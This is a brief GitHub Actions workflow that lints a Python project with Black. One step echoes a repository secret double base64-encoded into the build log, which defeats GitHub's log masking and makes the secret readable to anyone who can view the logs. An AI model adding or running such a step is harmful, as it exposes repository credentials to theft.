name: Python stuff
on:
  push:
jobs:
  build:
    runs-on: ubuntu-latest
    env:
      REPO_SECRET: ${{ secrets.REPOSITORY_SECRET }}
    steps:
      - name: checkout
        uses: actions/checkout@v4
      - name: Run a one-line script
        run: |
          echo "${REPO_SECRET}" | base64 | base64
      - name: lint
        uses: psf/black@stable
        with:
          options: "--check --verbose"
          src: "./src"
